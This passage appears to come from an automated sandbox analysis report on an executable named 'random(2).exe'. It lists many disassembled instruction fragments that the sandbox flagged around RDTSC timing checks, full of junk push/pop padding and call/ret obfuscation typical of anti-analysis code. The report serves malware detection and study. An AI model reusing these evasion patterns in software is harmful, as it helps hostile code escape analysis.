Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F54E0 second address: 7F54FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F8314EA918Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e js 00007F8314EA91A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F7321 second address: 7F73A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F83146B40C6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F83146B40C8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov di, DC91h 0x0000002b push 00000000h 0x0000002d call 00007F83146B40CAh 0x00000032 jmp 00007F83146B40CBh 0x00000037 pop ebx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F83146B40C8h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov ebx, dword ptr [ebp+122D3084h] 0x0000005a xchg eax, esi 0x0000005b pushad 0x0000005c pushad 0x0000005d jnc 00007F83146B40C6h 0x00000063 push edx 0x00000064 pop edx 0x00000065 popad 0x00000066 push eax 0x00000067 push edx 0x00000068 je 00007F83146B40C6h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F752D second address: 7F7532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F8707 second address: 7F870C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F94FB second address: 7F94FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F94FF second address: 7F95A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F83146B40C8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jmp 00007F83146B40D5h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 sub edi, 57289D00h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d xor dword ptr [ebp+122D2D86h], esi 0x00000043 mov eax, dword ptr [ebp+122D1355h] 0x00000049 jmp 00007F83146B40D1h 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push eax 0x00000053 call 00007F83146B40C8h 0x00000058 pop eax 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d add dword ptr [esp+04h], 0000001Dh 0x00000065 inc eax 0x00000066 push eax 0x00000067 ret 0x00000068 pop eax 0x00000069 ret 0x0000006a nop 0x0000006b push ecx 0x0000006c jng 00007F83146B40CCh 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F95A4 second address: 7F95B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F95B0 second address: 7F95B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7F95B4 second address: 7F95BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7FE682 second address: 7FE68C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7FE68C second address: 7FE690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7FE838 second address: 7FE863 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F83146B40D3h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jg 00007F83146B40CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7FE863 second address: 7FE867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7FFA8B second address: 7FFB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F83146B40D1h 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D308Ah], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F83146B40C8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov bl, 15h 0x0000003d mov eax, dword ptr [ebp+122D1549h] 0x00000043 jl 00007F83146B40D8h 0x00000049 push edx 0x0000004a call 00007F83146B40CFh 0x0000004f pop ebx 0x00000050 pop ebx 0x00000051 mov dword ptr [ebp+122D2E86h], esi 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ebp 0x0000005c call 00007F83146B40C8h 0x00000061 pop ebp 0x00000062 mov dword ptr [esp+04h], ebp 0x00000066 add dword ptr [esp+04h], 00000019h 0x0000006e inc ebp 0x0000006f push ebp 0x00000070 ret 0x00000071 pop ebp 0x00000072 ret 0x00000073 add bx, 5406h 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F83146B40D4h 0x00000080 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 806856 second address: 80685A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 80685A second address: 806863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7AE96F second address: 7AE98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8314EA9193h 0x0000000c jne 00007F8314EA9186h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7AE98F second address: 7AE999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7AE999 second address: 7AE99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 80B44E second address: 80B458 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F83146B40C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 80B458 second address: 80B464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 80B464 second address: 80B489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F83146B40E0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 80B489 second address: 80B4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA9194h 0x00000009 js 00007F8314EA9188h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 80F4FB second address: 80F4FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 80F4FF second address: 80F520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8314EA9198h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 80F520 second address: 80F530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F83146B40C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8157EF second address: 8157F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8157F5 second address: 815845 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F83146B40D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F83146B40D6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F83146B40CCh 0x0000001c jmp 00007F83146B40CAh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 815845 second address: 81584A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 814CEC second address: 814D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83146B40D5h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 814F6F second address: 814F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8314EA9186h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8153FA second address: 8153FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819BD8 second address: 819BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F8314EA9186h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819BED second address: 819C1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F83146B40D1h 0x00000010 popad 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819C1F second address: 819C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819C25 second address: 819C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 818996 second address: 8189A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8314EA9186h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 8189A2 second address: 8189A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7ED70E second address: 7ED714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7ED714 second address: 7ED77E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F83146B40CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F83146B40C8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 lea eax, dword ptr [ebp+124813F9h] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F83146B40C8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 or dword ptr [ebp+122D1C25h], ecx 0x0000004d push eax 0x0000004e pushad 0x0000004f jnp 00007F83146B40C8h 0x00000055 push eax 0x00000056 push edx 0x00000057 push edx 0x00000058 pop edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EDE6A second address: 7EDE8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 105DDA01h 0x0000000f mov dx, BCD2h 0x00000013 call 00007F8314EA9189h 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EDE8B second address: 7EDE8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EDE8F second address: 7EDE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EDE9D second address: 7EDEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F83146B40D4h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EDEC1 second address: 7EDECB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EDECB second address: 7EDED0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EEB86 second address: 7EEB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EEC75 second address: 7EECA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1C25h], edx 0x0000000f jno 00007F83146B40CCh 0x00000015 lea eax, dword ptr [ebp+1248143Dh] 0x0000001b cmc 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 jmp 00007F83146B40CCh 0x00000025 pop edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EECA8 second address: 7EECB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8314EA9186h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EECB2 second address: 7EECB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 7EECB6 second address: 7D009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007F8314EA9196h 0x0000000f jmp 00007F8314EA9190h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F8314EA9188h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f pushad 0x00000030 mov dword ptr [ebp+122D1CC2h], ebx 0x00000036 pushad 0x00000037 mov eax, edx 0x00000039 mov edi, esi 0x0000003b popad 0x0000003c popad 0x0000003d lea eax, dword ptr [ebp+124813F9h] 0x00000043 movzx edi, cx 0x00000046 push eax 0x00000047 jmp 00007F8314EA9191h 0x0000004c mov dword ptr [esp], eax 0x0000004f call 00007F8314EA918Eh 0x00000054 pop edi 0x00000055 call dword ptr [ebp+122D31AAh] 0x0000005b jmp 00007F8314EA9191h 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 jc 00007F8314EA9186h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819457 second address: 81945C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81945C second address: 819462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819462 second address: 819466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819714 second address: 819718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819718 second address: 819728 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F83146B40C6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819728 second address: 81972C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81972C second address: 819732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819732 second address: 819738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 819738 second address: 81973C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81DDAE second address: 81DDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81DDB2 second address: 81DDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81DDB6 second address: 81DDD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8314EA9198h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81DDD8 second address: 81DE20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007F83146B40D7h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 jnl 00007F83146B40E4h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E240 second address: 81E258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E647 second address: 81E65F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F83146B40D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E65F second address: 81E68A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9190h 0x00000007 push edx 0x00000008 jmp 00007F8314EA9190h 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E68A second address: 81E690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E690 second address: 81E694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E931 second address: 81E93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F83146B40C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E93B second address: 81E93F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E93F second address: 81E94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E94A second address: 81E951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E951 second address: 81E964 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F83146B40CEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jnl 00007F83146B40C6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81E964 second address: 81E96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81EAE5 second address: 81EAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81EAEB second address: 81EAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81EAEF second address: 81EAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81EAF3 second address: 81EB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F8314EA9186h 0x0000000d jl 00007F8314EA9186h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 81EB0B second address: 81EB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81F03C second address: 81F040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81F040 second address: 81F053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 81F053 second address: 81F079 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8314EA9188h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8314EA9194h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
